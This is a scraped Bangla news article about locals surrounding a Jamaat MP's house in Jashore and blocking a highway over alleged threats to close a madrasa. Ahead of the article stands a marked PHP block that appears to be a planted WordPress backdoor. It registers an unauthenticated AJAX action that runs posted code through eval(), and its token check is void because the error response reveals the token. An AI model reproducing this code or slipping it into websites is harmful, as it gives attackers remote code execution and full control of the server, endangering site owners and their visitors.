// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যশোরে মাদ্রাসা ‘বন্ধের হুমকি দেওয়ায়’ জামায়াত এমপির বাড়ি ঘেরাও, মহাসড়ক অবরোধ | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeঅপরাধযশোরে মাদ্রাসা ‘বন্ধের হুমকি দেওয়ায়’ জামায়াত এমপির বাড়ি ঘেরাও, মহাসড়ক অবরোধ

যশোরে মাদ্রাসা ‘বন্ধের হুমকি দেওয়ায়’ জামায়াত এমপির বাড়ি ঘেরাও, মহাসড়ক অবরোধ

স্থানীয় একটি মাদ্রাসাকে কেন্দ্র করে মারধর ও ভয়ভীতি প্রদর্শনের অভিযোগে যশোর-৪ আসনের সংসদ সদস্য (এমপি) ও জেলা জামায়াতে ইসলামীর আমির গোলাম রসুলের বাড়ির সামনে বিক্ষোভ করেছেন স্থানীয় বাসিন্দারা।

পরে বিক্ষোভকারীরা যশোর-নড়াইল মহাসড়ক অবরোধ করলে যান চলাচল বন্ধ হয়ে যায়। প্রায় তিন ঘণ্টা পর পুলিশ পরিস্থিতি নিয়ন্ত্রণে আনে।

আজ মঙ্গলবার সকাল সাড়ে ১০টার দিকে যশোর শহরের নীলগঞ্জ এলাকায় এমপি গোলাম রসুলের বাড়ির সামনে এ ঘটনা ঘটে।

প্রত্যক্ষদর্শীরা জানান, এমপির বাড়ির সামনে আল মাদ্রাসাতুশ শারইয়াহ ও মসজিদকে কেন্দ্র করে দীর্ঘদিন ধরে বিরোধ চলে আসছে।

নীলগঞ্জ এলাকার বাসিন্দা আব্দুস সালাম দ্য ডেইলি স্টারকে বলেন, ‘গতকাল সকালে এমপির মেয়ে মেডিকেল শিক্ষার্থী মেহজাবিন অনন্যার বিরুদ্ধে মাদ্রাসার শিশু শিক্ষার্থী আয়ান ও রেক্সনা নামে এক নারীকে মারধরের অভিযোগ ওঠে।’

স্থানীয় সূত্রে জানা গেছে, গতকাল রাতে দুই পক্ষের মধ্যে সমঝোতা হলেও আজ সকালে মাদ্রাসা কর্তৃপক্ষকে প্রতিষ্ঠানটি বন্ধ রাখতে নির্দেশ দেওয়া হয়েছে—এমন অভিযোগ ওঠার পর নতুন করে উত্তেজনা ছড়িয়ে পড়ে। পরে স্থানীয় বাসিন্দারা এমপির বাড়ির সামনে জড়ো হয়ে বিক্ষোভ শুরু করেন।

বিক্ষোভকারী রবিউল ডেইলি স্টারকে বলেন, ‘মাদ্রাসা বন্ধ করে দেওয়ার হুমকি দেওয়া হয়েছে। আজ সকালে বিক্ষোভকারীরা এমপির বাড়ির সামনে জড়ো হলে বাড়ির দ্বিতীয় তলা থেকে তাদের ওপর গরম পানি ছুড়ে মারা হয়। এতে পরিস্থিতি আরও উত্তপ্ত হয়ে ওঠে।’

প্রত্যক্ষদর্শীরা জানান, সকাল সাড়ে ১১টার দিকে এমপির স্বজন আবদুল্লাহ বিরোধ মীমাংসার চেষ্টা করতে এলে উত্তেজিত জনতা তাকে মারধর করেন। পরে বিক্ষোভকারীরা যশোর-নড়াইল মহাসড়ক অবরোধ করেন। তারা এমপি গোলাম রসুল ও তার মেয়ের বিরুদ্ধে আইনি ব্যবস্থা নেওয়ার দাবি জানান। খবর পেয়ে কোতোয়ালি থানার পরিদর্শক (অপারেশনস) ঘটনাস্থলে গিয়ে পরিস্থিতি শান্ত করতে উভয়পক্ষের সঙ্গে কথা বলেন।

জানতে চাইলে সব অভিযোগ অস্বীকার করে এমপি গোলাম রসুলের স্ত্রী শারমীন দীনা ডেইলি স্টারকে বলেন, ‘আমার মেয়ে অনন্যা মানসিক স্বাস্থ্যজনিত সমস্যায় ভুগছেন।’

তিনি বলেন, ‘মাদ্রাসাটি বন্ধ থাকলেও শিশুরা প্রায়ই সেখানে প্রবেশ করে হইচই করত। এ নিয়ে পরিবারের পক্ষ থেকে আপত্তি জানানো হলে পরবর্তীতে বিরোধের সৃষ্টি হয়।’

শারমীন দীনা আরও বলেন, ‘আমাদের বাড়িতে হামলা চালানো হয়েছে। এখন আমাদের বিরুদ্ধে মিথ্যা অভিযোগ তোলা হচ্ছে।’

এ বিষয়ে জানতে এমপি গোলাম রসুলের সঙ্গে যোগাযোগের চেষ্টা করা হলেও তার বক্তব্য পাওয়া যায়নি।

মাদ্রাসার মুহতামিম (প্রতিষ্ঠানপ্রধান) কবির হোসেন ডেইলি স্টারকে বলেন, ‘এমপি গোলাম রসুলের মেয়ে অনন্যা মাদ্রাসায় শিশুদের যাতায়াত ও অবস্থান পছন্দ করতেন না। তিনি প্রায়ই সেখানে গিয়ে শিক্ষার্থীদের বকাঝকা করতেন এবং মাদ্রাসাটি বন্ধ করে দেওয়ার হুমকি দিতেন।’

যশোর কোতোয়ালি মডেল থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) মাসুম খান ডেইলি স্টারকে বলেন, ‘পুলিশ উভয়পক্ষকে শান্ত থাকার আহ্বান জানানোর পর দুপুর ১টার দিকে পরিস্থিতি স্বাভাবিক হয়।’

তিনি বলেন, ‘ঘটনাটি আরও তদন্ত করে প্রয়োজনীয় আইনি ব্যবস্থা নেওয়া হবে।’
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments